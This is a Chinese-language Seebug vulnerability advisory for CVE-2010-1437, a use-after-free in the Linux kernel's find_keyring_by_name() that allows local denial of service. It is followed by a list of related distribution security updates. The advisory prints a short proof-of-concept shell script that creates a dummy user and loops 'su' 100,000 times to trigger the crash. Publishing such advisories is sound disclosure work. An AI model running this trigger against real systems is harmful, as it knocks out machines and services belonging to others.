Lucene search
RootSSV:19531HistoryApr 29, 2010 - 12:00 a.m.
Linux kernel 2.6.34-rc5 find_keyring_by_name()函数本地内存破坏漏洞
2010-04-2900:00:00
Root
www.seebug.org
11
0.0004 Low
EPSS
Percentile
0.4%
BUGTRAQ ID: 39719
CVE ID: CVE-2010-1437
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的find_keyring_by_name()函数可能获得已经释放的密钥环,之后再访问该密钥环就会触发内存破坏,导致拒绝服务的情况。
Linux kernel 2.6.34-rc5
厂商补丁:
Linux
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
#!/bin/sh
LOOP=100000
USER=dummy_user
# add
/bin/su -c "exit;" $USER || { /usr/sbin/adduser -m $USER; add=1; }
for ((i=0; i<LOOP; i++))
do
/bin/su -c "echo '$i' > /dev/null" $USER
done
# del
(( add == 1 )) && /usr/sbin/userdel -r $USER
exit
Related
prion
prion
Race condition
2010-05-07 18:30:00
ubuntucve
ubuntucve
CVE-2010-1437
2010-05-07 00:00:00
cve
cve
CVE-2010-1437
2010-05-07 18:30:00
veracode
veracode
Privilege Escalation
2020-04-10 00:50:28
openvas
openvas
Fedora Update for kernel FEDORA-2010-9183
2010-06-07 00:00:00
Fedora Update for kernel FEDORA-2010-9183
2010-06-07 00:00:00
CentOS Update for kernel CESA-2010:0474 centos4 i386
2010-08-30 00:00:00
nessus
nessus
Fedora 13 : kernel-2.6.33.5-112.fc13 (2010-9183)
2010-07-01 00:00:00
Fedora 12 : kernel-2.6.32.14-127.fc12 (2010-9209)
2010-07-01 00:00:00
CentOS 4 : kernel (CESA-2010:0474)
2010-08-24 00:00:00
fedora
fedora
[SECURITY] Fedora 13 Update: kernel-2.6.33.5-112.fc13
2010-05-31 18:30:28
[SECURITY] Fedora 13 Update: kernel-2.6.33.6-147.2.4.fc13
2010-08-03 01:11:50
[SECURITY] Fedora 13 Update: kernel-2.6.33.6-147.fc13
2010-07-08 18:24:53
centos
centos
kernel security update
2010-08-23 15:16:15
kernel security update
2010-07-02 11:14:40
redhat
redhat
(RHSA-2010:0474) Important: kernel security and bug fix update
2010-06-15 00:00:00
(RHSA-2010:0504) Important: kernel security and bug fix update
2010-07-01 00:00:00
(RHSA-2010:0631) Important: kernel-rt security and bug fix update
2010-08-17 00:00:00
oraclelinux
oraclelinux
kernel security and bug fix update
2010-06-16 00:00:00
kernel security and bug fix update
2010-07-01 00:00:00
Oracle Linux 5.6 kernel security and bug fix update
2011-01-20 00:00:00
suse
suse
remote denial of service in kernel
2010-07-20 16:48:50
local privilege escalation in kernel
2010-09-23 16:37:26
vmware
vmware
VMware ESX third party update for Service Console kernel
2010-11-29 00:00:00
ubuntu
ubuntu
Linux kernel vulnerabilities
2010-08-04 00:00:00
debian
debian
[SECURITY] [DSA 2053-1] New Linux 2.6.26 packages fix several issues
2010-05-25 06:51:38
securityvulns
securityvulns
Linux kernel multiple security vulnerabilities
2010-05-26 00:00:00
[SECURITY] [DSA 2053-1] New Linux 2.6.26 packages fix several issues
2010-05-26 00:00:00
osv
osv
linux-2.6 - several issues
2010-05-25 00:00:00